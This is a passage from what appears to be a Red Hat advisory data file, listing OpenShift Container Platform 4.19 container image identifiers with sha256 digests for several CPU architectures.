"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/openstack-resource-controller-rhel9@sha256:ed079597ea5b2fe6bf4d4b7efa09f6cb76691362c62a268accb0d5bb5fd7daed_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-agent-installer-api-server-rhel9@sha256:2845efdf030408d0d545862b74020ec95c2e2f4c0fbcd6d5834002fd1f224b9a_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-agent-installer-api-server-rhel9@sha256:ae56b7456515539ec14105e5a8221b83dc53c1a5571a6e46e0c3b0632f98096c_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-agent-installer-api-server-rhel9@sha256:b3351e1878d5ef1111ce4b2eca74bad875b8773b11b8597f83c11a7f7b226da7_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-agent-installer-api-server-rhel9@sha256:b72fc45f6e78468f442c5bf487721227053eb0d49ef3eea5be6cef181007e290_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-agent-installer-csr-approver-rhel9@sha256:12309e06f58c6b122ebc7ef2958ec0a0526edd9ea21b888866dcc2f753a7cf2d_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-agent-installer-csr-approver-rhel9@sha256:5727ab378cdf09a1eb20b6120da5ee6d66a1473ea0d7dfd0709faf5c53df615f_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-agent-installer-csr-approver-rhel9@sha256:d85ca66233c95a4b622d97b50ae304dab7cd3ea67efbc40ab9ddb723478104b7_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-agent-installer-csr-approver-rhel9@sha256:f26b039b69b5d006e04148dd4e7d6bcada2ae22c8892e094e43c6bb307a99cea_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-agent-installer-node-agent-rhel9@sha256:1f2b394a49751e0cbc81a776a8abefaee56aea8a2449a56f66ec4fb8bd7b36a0_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-agent-installer-node-agent-rhel9@sha256:5a3bb13d5a7dfd660ce6ca1799af07ff0eb73148a51b3e5864fda09650186530_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-agent-installer-node-agent-rhel9@sha256:a676ed9f3d05a12ca0965f8b33d002d95cc8578f5a74f0bcf984594d784b0e3c_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-agent-installer-node-agent-rhel9@sha256:dbd96ce5c1082dd3f2de07bd34f805d64952bee798cd96f2d9f94d195acbfd2e_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-agent-installer-orchestrator-rhel9@sha256:0104fa2a05916db8ce121350b3e026a74891560be71999451943090f63d727a2_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-agent-installer-orchestrator-rhel9@sha256:590caaaf15b7a11ce69df24820ddc1f4b0b7a1c7cc5d2e62e2c3bfd35a5bb733_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-agent-installer-orchestrator-rhel9@sha256:69d052085b27f034e581680b283ed51134f2d8d5c895f0b2984946c158304249_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-agent-installer-orchestrator-rhel9@sha256:69f33223ac1b30068c884ba58ef4f04545ed5d02dab43dd525ff3f66c299885f_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-agent-installer-utils-rhel9@sha256:0beec3d7cd2663215fbfd97490b8aa1a684580e273dd9161d574f3ce5fe936b5_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-agent-installer-utils-rhel9@sha256:19636219d56bc03c8641e266ed3d82cae94bd7431e3da0c48ccba9bfb541ef6f_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-agent-installer-utils-rhel9@sha256:2ad51487bd9dd02bdabe506d2c5758a9e9df2903a8a63d1a19d720281390eebc_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-agent-installer-utils-rhel9@sha256:7c081487e39de209265d2bb960fb68fa2997e1620f37bdd3bb1aac57483bbbe7_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-apiserver-network-proxy-rhel9@sha256:13560a7a1ab60ebe5a593c4c6819d730f1e8fad5031a5a38b7aa8ebcb52776b9_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-apiserver-network-proxy-rhel9@sha256:4f90910be0a33320bf234e3c25b6c364a0e730d76be53fc8c7e50227c14e25e2_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-apiserver-network-proxy-rhel9@sha256:7406a10e78b85749cd597d3ced8b69a87a7931119611e996dd8cd660ff1ac47c_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-apiserver-network-proxy-rhel9@sha256:d710074f9ebfa1ec4e15c5ee4718b748259f8907f4ec0aa56045c00cf19a691c_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-aws-cloud-controller-manager-rhel9@sha256:6bf2ac59bb7ee40409082d564bde5d5568be09bd21219fe0c62ebc6624912b1a_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-aws-cloud-controller-manager-rhel9@sha256:8ad00ec95b55f781061f47a2b0b7b2ae6e557bb9cdbad826c097fde6a5b7d791_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-aws-cluster-api-controllers-rhel9@sha256:3dc93509b8cad942ffeea32ba1c75db4b94a66a8c1a6d7b29f13ed6ec83e5f9b_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-aws-cluster-api-controllers-rhel9@sha256:ae91dc01aca5115ba88290f86ab266ad69b86c68c83097adafb82defdfc5c524_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-aws-ebs-csi-driver-rhel9-operator@sha256:67f9c3e3f77df4be9e4925fe7c5fb4cb95d770395bbb1b32847c7100d8f9e8fe_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-aws-ebs-csi-driver-rhel9-operator@sha256:ef09a660c5bd1b44464ed961ade4f9ceef47dfe1005efde15de94631dadebf4f_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-aws-ebs-csi-driver-rhel9@sha256:d1a5ebdd8e8fcd15749e48a18cf340a309c6c219c8adf85d2df1caa773784d86_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-aws-ebs-csi-driver-rhel9@sha256:de7f8ba8b4ed81e733af2d6b40e2dbb97c7afdc627973bfb838bd69ed9183eba_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-aws-pod-identity-webhook-rhel9@sha256:15b866541c161693e74ad7106aec45b9713f81e1f3e2f10deb0822b58fbb884e_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-aws-pod-identity-webhook-rhel9@sha256:240132f7cf6ec28b4f711323b5c9f10ba76e85ba0ed2e66c663096089fdcc128_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-azure-cloud-controller-manager-rhel9@sha256:2191714083728cc0984775c5b8c3ee972723c1378058f0923ab60036345d9825_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-azure-cloud-controller-manager-rhel9@sha256:249b48b699ef21517d11a3533293184b1524b5907fec00593a98f0581363dc12_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-azure-cloud-node-manager-rhel9@sha256:660ad818c22efdd4fb965ded889c7ed08b331cb8d50c145bd4a34e74158f790a_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-azure-cloud-node-manager-rhel9@sha256:deb01110f819b3534a2bd24b5406c69bcf5011eaebdeec438a31f1cd68f18029_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-azure-cluster-api-controllers-rhel9@sha256:255b3979a3a054696f21f437998c892b5738cbbcdc021b0a22752f1d9bb48712_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-azure-cluster-api-controllers-rhel9@sha256:d665a06a23572a2bcf3345f9c22b2b9895292e1f43d5532b793a3ea4df0c42c8_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-azure-disk-csi-driver-rhel9-operator@sha256:086285dd82aadc71803c847a06a2e0727b4fbb09f07a5bf95979ebc50bb95e82_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-azure-disk-csi-driver-rhel9-operator@sha256:0f5c719b22dbba95b6d61db0c63ba8107689a7d61f6944e0d2dc5fa3e693d25e_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-azure-disk-csi-driver-rhel9@sha256:1452416d5cfd9acae6f0bf60da783ec8cf632784655f4602462cf380cd7fe518_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-azure-disk-csi-driver-rhel9@sha256:b13a67c30437a6950f41cdda853305d03ac24809746bdca955782db1c59824b1_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-azure-file-csi-driver-operator-rhel9@sha256:43f58c25df6d439ab60c6a7fd905db92d67678bf55732103069b9d3ce9a6ee1d_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-azure-file-csi-driver-operator-rhel9@sha256:5eca83117e60a69246033c3cedcc2e2962e0f0a6ae6d6d7e3c35546cdc78ce70_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-azure-file-csi-driver-rhel9@sha256:daddd3f94f513bfce03ea0c5aa406164838aa7bc41c3251b02686fd86da09d7a_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-azure-file-csi-driver-rhel9@sha256:f1a3870617f3e6c0774b5484820351c404cabe3161684c6edf3b81554cf9f1de_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-azure-workload-identity-webhook-rhel9@sha256:4f54884bb854edec3a1a28ba089ddc068edc3ad0677637dd9b033a1c0ff8052c_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-azure-workload-identity-webhook-rhel9@sha256:834a2b63a74d7af617155da8f25a36f196b7c16a78154468b1cb88a10fdfa88d_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-baremetal-cluster-api-controllers-rhel9@sha256:3f79fe8b748ce5015d5d71ce8da20bbff7241868e87066d1d50083a3ceb91bfe_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-baremetal-cluster-api-controllers-rhel9@sha256:66745a12cf917414d197c589e7e57a62958da4c66d5372e848e40568d8ddfafc_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-baremetal-cluster-api-controllers-rhel9@sha256:900e5ff2f8ea86f0864c6a3cd1707a620427189f5bfffa0bb0ea9a8c0ed85330_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-baremetal-cluster-api-controllers-rhel9@sha256:c029ff100811f13c0ba79c03044e0c6f096567511c336e4d1ecced6e900c2acd_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-baremetal-installer-rhel9@sha256:37fe6420e98e7d1927492a7a40fd01578cfaf441530b7bf2f85cc7d593d7b097_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-baremetal-installer-rhel9@sha256:480d7e114879e0c9bcfd62250af7f2f7b4a25e7d4cca65d97c422349fe164334_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-baremetal-installer-rhel9@sha256:6f49794879ad8a54b4a9ba77661ebdf84cb90a048d1472c1f878c10a9ecc46e6_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-baremetal-installer-rhel9@sha256:77c778debce0cb2eff5f5e66a3db3e30905e0138de3ddc3cd5330d2a79ec2cf9_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-baremetal-machine-controllers-rhel9@sha256:6aef6b3ea8ceb252107d24252c9c155e21d42825343e2a824d869f897a86da4f_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-baremetal-machine-controllers-rhel9@sha256:895cb0d9b4715a75c1ffa4539bbd86c14f774e664ab16f5df4bc3e55ef537225_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-baremetal-machine-controllers-rhel9@sha256:99fc0e641a6014bad4027471174578ba22c0a4a99c05b6bca1e8c838bbda0a90_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-baremetal-machine-controllers-rhel9@sha256:aee32f17c4c4aa3deaca4a1884efc7c1a05d4fdadea145b247c4364e9e82086a_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-baremetal-rhel9-operator@sha256:07f2b6c01f22078c6b6eea7916982ebfcf6f992daf0d80af7b18972e6c484868_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-baremetal-rhel9-operator@sha256:3efbeb0ba231cc16b69a86c43c28aa02b7e773413b361ceaf82c72cb215dc187_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-baremetal-rhel9-operator@sha256:a212996fe27771f82406dc36d68e07e29ecf975834c3cde6395b35cd259edbe9_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-baremetal-rhel9-operator@sha256:b7f1f48335150e9e3ff89c0c349345f2c7fb6d7cf27793d263cca791d53f260c_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-baremetal-runtimecfg-rhel9@sha256:39852b09d2ff95f03cff6f39398c67d30d64366f00a0ca73319d81831b7f6e23_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-baremetal-runtimecfg-rhel9@sha256:6d2dbe2a871324b770da093074a9fcac3aa590896e366354f8202bf80eae70ed_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-baremetal-runtimecfg-rhel9@sha256:9df2c55943c62172a5ab42fcd2309a232a8e455240efeba614e2e70308972764_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-baremetal-runtimecfg-rhel9@sha256:e6aaec6333f15e8aa67ad391f57eb7225007c068947982d18fea6b90d837e6e2_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cli-artifacts-rhel9@sha256:02c4fe2761b586f29c78d9419f0b90d98bee92b8d4fa47ec77dfe45795fab7fb_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cli-artifacts-rhel9@sha256:4b1a4e3c67e3fc5c14a8cb7130eec3ea191f27473942f7afb09b497a30236947_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cli-artifacts-rhel9@sha256:a9e099fe57f31d4e86d0edbad9605aae421fbe410d1b7c2f6e7036940ba5e319_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cli-artifacts-rhel9@sha256:e3504f1bb6b8b89f4f01ecefc3c8646cbc949d638bfa6db0638476731d9f0e96_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cli-rhel9@sha256:1cdfe759fe6d9b1745276957b712c1a46a69ce1c59706a7ba9ca8f3f89cc844d_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cli-rhel9@sha256:2fafd2b4c0fb8500c0180c767e55f70d26203e68500e64d252fe3a10227a161a_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cli-rhel9@sha256:5a96f6965efd6579efde9b1a1b4ae88b57cbb49f38cf2a39ef90a55470a30667_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cli-rhel9@sha256:95c126293ef394a5ce8882e8cfa9c6f6c22e9cae79e64e07f0e1e57a8fb55211_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cloud-credential-rhel9-operator@sha256:4e885357cb52fffbb832d31d97400cfc629f26d5c38b4692379d08ba485f46d2_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cloud-credential-rhel9-operator@sha256:645168f7cb91679d374bc1e431181a1b964dec279265ec52e5809b368e08654c_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cloud-credential-rhel9-operator@sha256:7c20e19cdbb62a268ffea39d5e0004fb4e6b587c41250c73180043f56b9fe0e5_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cloud-credential-rhel9-operator@sha256:c17396793e30858f900b68ed2981f38062d501b7600a5e4ca127d4e14113aca4_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-api-rhel9@sha256:56453e8ce0dbb39d0259d2f0b36f58d8f049bf6c1a880b8a1eaa37d8ade32067_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-api-rhel9@sha256:6513461d1b413d648dc1d2327fac029633f5d34322459f2752d1096648fa37b4_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-api-rhel9@sha256:9a083427c52dcc2f9716408cf23991613eef7c41fb6eb1ee4841491276971039_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-api-rhel9@sha256:dcfe6ab706950430187a24e9792b6f0c270f813841e799ea7e35623679269ae5_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-authentication-rhel9-operator@sha256:334e975b0d8a94ec45ade469bf86809c9a07e9456cda5d5c71d6f91a2877faa0_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-authentication-rhel9-operator@sha256:64dfc7beaf3a8cfdab85ba963db74971ca68b6cf614aa04279f4af3239806e4c_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-authentication-rhel9-operator@sha256:7b99d625b14ced1fd44520bd106906dd60f84e7794257fe3b4d3a3aa685ebbbc_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-authentication-rhel9-operator@sha256:8b854d27a269e0f6b6d542f652c504ab0678ac18d1b84db63078257eebe090cf_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-autoscaler-rhel9-operator@sha256:2601add0c23c9e27079274736508adab64c6ae4128f66a53df3f569fe2d9fe3f_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-autoscaler-rhel9-operator@sha256:6917cb0e3b073a13ec29e5c329f01cf2ec26e78d47c3c8360d0063d186a4ba53_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-autoscaler-rhel9-operator@sha256:a400d84e7f46869a2c2f75b6f221684879b680910b5e5e4662e074a020483cf4_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-autoscaler-rhel9-operator@sha256:d94b765497d2fa316fbf4ec374572a5fba96a99b78dfe02b6ed6986e2b7782e6_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-autoscaler-rhel9@sha256:26b8049bd1a84ed402fad985ca842bf91ba86fbc5e46f7dea0050120ca551643_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-autoscaler-rhel9@sha256:4c28562416c8308c00af299859adfd3cfb4ef790ef2b6668299dc487c6fa3f45_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-autoscaler-rhel9@sha256:645feaaa568676e0c2b1c620a81a1a60d321800b940d46d2514aa59e1f25e2c9_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-autoscaler-rhel9@sha256:78bdc6e0ac3da2daf1f39e07c6554ac500deec9670561477f9cf0a346e1145bf_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-baremetal-operator-rhel9@sha256:59b6c20394bfa15bb36a9ac9b4ef03ae6bdadfcfd110c46fee13ac2abc9f6fa3_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-baremetal-operator-rhel9@sha256:79a30df8b6d7ef52409a3145663550ccf0fbde7e5bffc7e91ccefe2f276e44af_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-baremetal-operator-rhel9@sha256:9324047c73a33a920fe6403604cd123f81dc7663c4780934f4da3b95f0bb5bac_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-baremetal-operator-rhel9@sha256:960007197db71f1b34bdeadf7bc13323cff680b273f795dfcffc569867f695b2_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-bootstrap-rhel9@sha256:0685735bcfb4c4a112c1796dcfccf10233e0e62e1538520aa6e02abf8dd88c27_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-bootstrap-rhel9@sha256:12bfb2d2bbc5c7bbf8a161f97c1521d0a5c7ef8ad6e3aca825e62cf066a51109_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-bootstrap-rhel9@sha256:d9a9c57749c9d3e56e51d0b67ac5929949a900b1e6c96a4414366afc1ef4ba3b_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-bootstrap-rhel9@sha256:f3650443d49b825783ed4f308ff994be4b24c86dee1e2825274d58e0d4b02a28_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-capi-rhel9-operator@sha256:9d90ec3d15ade36e666eee154f9b934259cf811b4a9f987ef18300b78bbe35d3_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-capi-rhel9-operator@sha256:9feb86c7f0170dfae9273fe7e3ba662b7333ce8d05ee411b9e7d9c82447b2f2c_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-capi-rhel9-operator@sha256:a1bc835a8621c88b52ddff53d6701b5cefe7cc6f2efb80836c239cb333945043_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-capi-rhel9-operator@sha256:e53bfa8ab4ae569c697bba0b37c25afb495cc6cf324fb4ed50bd8ffc737c04f9_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-cloud-controller-manager-rhel9-operator@sha256:1264333969e9e7825b6ece8ed3a80a3eeac54564ae51d2aed817e4028fbef931_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-cloud-controller-manager-rhel9-operator@sha256:aa2f9d5b3b26615c429128234a5dea3cfa7f4f6d5ce3d9d4e6bf6796bafbb50b_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-cloud-controller-manager-rhel9-operator@sha256:b2115e5268813615088ca48f0138ff6910b07513be4177cd74485d2d41f0e249_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-cloud-controller-manager-rhel9-operator@sha256:c8e791718d7e4a68571b873bd0c68aeffc217fe69ee7e74741ecda295fb67dbd_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-config-api-rhel9@sha256:290f5dcc66373ff79cbcda33e6fbba989c48ae2bf8b623c57e065110e36524db_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-config-api-rhel9@sha256:572cc6f2f303a9190588696d5bdc80fca9ac3c32d5de9c5d94a27861c871a1c5_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-config-api-rhel9@sha256:d1561efe3cc68b60fbfc765e028dee3cf4a7666dc499f028c98603075d99a9d7_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-config-api-rhel9@sha256:e04cc25c77ffb05e86a6fea6dc8a6e5c35563612305adbcb98cd0b4832c97ed1_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-config-rhel9-operator@sha256:96fdf677680bf809356060d0af7fc9166608de5dc4d546e671f3071910558381_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-config-rhel9-operator@sha256:a13951576eb84ab6c6d3b800976320f8bebadad21e49b38faa99e8d1adcc520f_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-config-rhel9-operator@sha256:a8ce501ca7269a42fbb749fd0d3adb03c49468282e1f41e483e569c8acc1f777_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-config-rhel9-operator@sha256:cd0bb571991f485f4f33aadb8434e1d5e3b6c3bf7ac4e1e62994de0b190b6ec6_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-control-plane-machine-set-rhel9-operator@sha256:0c5df10c40e0bfbed23f193b9aedaf953a5e1e3f4cbbe5f1924866d1ec7f55cf_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-control-plane-machine-set-rhel9-operator@sha256:4cdff720094bd0b07e3dd6ae9b5b88756a890fd1ac39361629c44817766fe69e_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-control-plane-machine-set-rhel9-operator@sha256:b28fe78ee564e859188499e768d57e3e0fe2ad0afb715b0d76ce0c99960f3cd1_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-control-plane-machine-set-rhel9-operator@sha256:eb91a50e029bf839ff7be93783acbbd5ea72ba6f3bf9f9dc10c0588c23280f51_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-csi-snapshot-controller-rhel9-operator@sha256:0ac703dd7441374f349bfeb3639c1a7e364c9764aeb4b9ac05ea7879cce4a5a1_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-csi-snapshot-controller-rhel9-operator@sha256:4b6155be40a57801b21c44a7b50f89801b15dba8a51dad03969b25bee1a22b6b_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-csi-snapshot-controller-rhel9-operator@sha256:adedcc1ce23f14f3759818cddb9dbbe73dc1f772e3b58e229433f7b6e2f0f5b8_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-csi-snapshot-controller-rhel9-operator@sha256:e81081ad64219f09b1eef538df2903264d087d898aa81bebb6634fe4342efc59_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-dns-rhel9-operator@sha256:5185785b29d581adb9e8ed4e23ba11c7d67090f4c6e59b0287d2a36c83fd8ae1_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-dns-rhel9-operator@sha256:582a1302e53fa201431ccd497816d939ed23590d6d4128cb281a03fcf90f9475_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-dns-rhel9-operator@sha256:5d920d843fb0958a750b86ee532642adc3a77f5e060d54cfa5327e4f41465772_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-dns-rhel9-operator@sha256:cfe7eed06e5855c82c72a26bad2c2354091e94c51b692637cd8e79027ea6742a_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-etcd-rhel9-operator@sha256:73738cc655778a94527afe3ae48c4ca932590e4f78f03811f70d2d35f5090d3e_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-etcd-rhel9-operator@sha256:9673f610031257e254dc32e569b3471168e5c18a352ad5bddc9bd51e686eb4e6_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-etcd-rhel9-operator@sha256:e61ccfe3880e902a0e1cb9e718f62cbf57ce70435092f90f19e441fba2e899d1_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-etcd-rhel9-operator@sha256:f66818672229085d1982f4b0053c75d26e6faa4893331f6024b33f953426339d_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-image-registry-rhel9-operator@sha256:1d89f84175f9a72d05074562aeacda38b9047a99974a186a8a4d2d72e20c92f1_arm64",
